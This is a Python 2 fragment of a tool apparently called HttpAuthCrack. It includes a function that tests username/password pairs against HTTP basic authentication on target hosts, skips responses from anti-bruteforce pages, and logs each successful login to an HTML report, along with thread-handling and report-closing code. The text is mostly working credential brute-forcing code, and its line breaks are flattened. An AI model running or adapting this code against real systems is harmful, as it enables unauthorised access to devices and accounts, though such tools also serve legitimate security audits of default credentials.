def test_host(host,user,passwd): """Test the basic auth in host given using usr and pass given. """ try: Log.info("["+host+"] Checking %s/%s" %(user,passwd)) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, host, user, passwd) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) source = urllib2.urlopen(host, timeout=5) if len(str(source)) > 0: # Some devices show an html page after a number of tries to avoid bruteforce. We discard those. html = str(source.read()) if html.find('HTTP 401') > 0: Log.warn("["+host+"] HTTP 401 found in html. Possibly false positive. Omitting from output") return -1 # Access granted using admin/admin Log.success("Access granted with "+user+"/"+passwd+" to "+host) outputLock.acquire() output.writelines("<tr><td><a href="+host+" target=\"_blank\">"+host+"</a></td><td>"+user+"</td><td>"+passwd+"</td></tr>") outputLock.release() return -1 # return -1 to stop looking in a host when we have access to. return 0 except Exception, e: Log.err("["+host+"] Error: %s" % e) return 0
# Wait for all trheads to complete for t in threads: t.join() # End html log and close the file aux = open(RFOOTER,"r") outputLock.acquire() output.writelines("</table>") output.writelines("<br><br><div>Report generated by HttpAuthCrack v"+version+" on "+datetime.datetime.now().strftime("%Y/%m/%d %H:%M")+"</div>") output.writelines(aux.read()) outputLock.release() aux.close() output.close() except KeyboardInterrupt, e: Log.warn("Terminating all Threads due to Keyboard Interrupt...") outputLock.acquire() output.writelines("<h2>Execution stoped by user!!!</h2>") outputLock.release() exitFlag = 1 # End html log and close the file aux = open(RFOOTER,"r") outputLock.acquire() output.writelines(aux.read()) outputLock.release() aux.close() output.close() print "Exiting Main Thread"